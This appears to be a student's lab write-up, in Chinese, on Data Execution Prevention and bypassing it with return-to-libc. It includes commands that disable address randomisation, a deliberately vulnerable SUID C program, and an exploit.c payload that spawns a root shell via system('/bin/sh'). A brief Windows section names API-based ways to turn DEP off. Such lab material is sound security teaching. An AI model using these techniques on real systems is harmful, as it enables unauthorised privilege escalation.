20155306 白皎 0day漏洞——漏洞利用原理之DEP
20155306 白皎 0day漏洞——漏洞利用原理之DEP
一、DEP機制的保護原理
1.為什麽出現DEP?
溢出攻擊的根源在於現代計算機對數據和代碼沒有明確區分這一先天缺陷,就目前來看重新去設計計算機體系結構基本上是不可能的,我們只能靠向前兼容的修補來減少溢出帶來的損害,DEP(數據執行保護,Data Execution Prevention)就是用來彌補計算機對數據和代碼混淆這一天然缺陷的。
2.DEP是什麽?
DEP-數據執行保護的縮寫,DataExecutionPrevention。能夠在內存上執行額外檢查以幫助防止在系統上運行惡意代碼。
2.DEP工作原理是什麽?
DEP的基本原理是將數據所在內存頁標識為不可執行,當程序溢出成功轉入shellcode時,程序會嘗試在數據頁面上執行指令,此時CPU就會拋出異常,而不是去執行惡意指令。DEP 的主要作用是阻止數據頁(如默認的堆頁、各種堆棧頁以及內存池頁)執行代碼。
二、利用Ret2Lib繞過DEP
- Linux下利用Ret2Libc繞過DEP
原理分析
系統庫函數通常是不受DEP保護的,所以通過將返回地址指向系統函數可以繞過DEP保護,所以可以通過調研系統函數system()獲得shell。system函數是通過/bin/sh命令去執行一個用戶執行命令或者腳本,因此,我們完全可以利用system來實現Shellcode的功能。
return-into-libc原理:
攻擊者能夠通過緩沖區溢出改寫返回地址為一個庫函數的地址,並且將此庫函數執行時的參數也重新寫入棧中。這樣當函數調用時獲取的是攻擊者設定好的參數值,並且結束後返回時就會返回到庫函數而不是 main()。而此庫函數實際上就幫助攻擊者執行了其惡意行為。
攻擊步驟
1.輸入命令安裝一些用於編譯 32 位 C 程序的東西。
sudo apt-get update
sudo apt-get install lib32z1 libc6-dev-i386
sudo apt-get install lib32readline-gplv2-dev
2.輸入命令“linux32”進入 32 位 linux 環境。輸入“/bin/bash”使用 bash。
關閉地址空間隨機化,不能隨機堆(heap)和棧(stack)的初始地址。以及設置堆棧不可執行。
gcc -z noexecstack -o test test.c //棧不可執行 sudo sysctl -w kernel.randomize_va_space=0 //關閉地址隨機化
3.添加一個新用戶,可以參考教程:linux中新建一個用戶
4.即使你能欺騙一個 Set-UID 程序調用一個 shell,也不能在這個 shell 中保持 root 權限,這個防護措施在/bin/bash 中實現。
linux 系統中,/bin/sh 實際是指向/bin/bash 或/bin/dash 的一個符號鏈接。為了重現這一防護措施被實現之前的情形,我們使用另一個 shell 程序(zsh)代替/bin/bash。下面的指令描述了如何設置 zsh 程序。
5.把以下漏洞代碼保存為“retlib.c”文件,保存到 /tmp 目錄下,並進行編譯,設置。代碼如下:
include <stdlib.h>
include <stdio.h>
include <string.h>
int bof(FILE *badfile)
{
char buffer[12];
/* The following statement has a buffer overflow problem */
fread(buffer, sizeof(char), 40, badfile);
return 1;
}
int main(int argc, char **argv)
{
FILE *badfile;
badfile = fopen("badfile", "r");
bof(badfile);
printf("Returned Properly\n");
fclose(badfile);
return 1;
}
6.編譯上述程序編譯該程序,並設置 SET-UID。
sudo su//獲取root權限
gcc -m32 -g -z noexecstack -fno-stack-protector -o retlib retlib.c//設置棧不可執行
chmod u+s retlib //給retlib程序的所有者以suid權限,可以像root用戶一樣操作
exit
7.此外,我們還需要用到一個讀取環境變量的程序,並通過 gcc -m32 -o getenvaddr getenvaddr.c進行編譯。
include <stdio.h>
include <stdlib.h>
include <string.h>
int main(int argc, char const *argv[])
{
char *ptr;
if(argc < 3){
printf("Usage: %s <environment var> <target program name>\n", argv[0]);
exit(0);
}
ptr = getenv(argv[1]);
ptr += (strlen(argv[0]) - strlen(argv[2])) * 2;
printf("%s will be at %p\n", argv[1], ptr);
return 0;
}
8.獲得 BIN_SH 地址
export BIN_SH="/bin/sh"
echo $BIN_SH
./getenvaddr BIN_SH ./reblic
9.以下代碼為攻擊程序,保存為“exploit.c”文件,保存到 /tmp 目錄下。
include <stdlib.h>
include <stdio.h>
include <string.h>
int main(int argc, char **argv)
{
char buf[40];
FILE *badfile;
badfile = fopen(".//badfile", "w");
strcpy(buf, "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");// nop 24 times
*(long *) &buf[32] =0x11111111; // "//bin//sh"
*(long *) &buf[24] =0x22222222; // system()
*(long *) &buf[36] =0x33333333; // exit()
fwrite(buf, sizeof(buf), 1, badfile);
fclose(badfile);
}
10.獲取 system 和 exit 地址
gcc -m32 -g -o exploit exploit.c//編譯
gdb -q ./exploit//調試
b 10//設置斷點
run//運行到斷點處
p system//獲取system地址
p exit//獲取exit地址
11.修改 exploit.c 文件,填上剛才找到的內存地址。刪除剛才調試編譯的 exploit 程序和 badfile 文件,重新編譯修改後的 exploit.c。
12.首先運行攻擊程序,生成badfile文件,載運行漏洞程序,可以看到攻擊成功,獲得root權限。
- Windows下利用Ret2Libc繞過DEP
突破思路:
既然DEP不允許直接執行,我們可以在其他可執行位置為shellcode的每一條指令找到一條替代指令,就可以完成exploit了。(每一條指令都有一個ret,以便回收程序控制權),有三種方法:
1、通過跳轉到ZwSetInformationProcess函數將DEP關閉,再轉入shellcode;
2、通過跳轉到VirtualProtect函數來將shellcode所在內存頁設置為可執行狀態,再轉入shellcode;
3、通過跳轉到VirtualAlloc函數開辟一段具有執行權限的內存空間,然後將shellcode復制到這段內存中執行。
20155306 白皎 0day漏洞——漏洞利用原理之DEP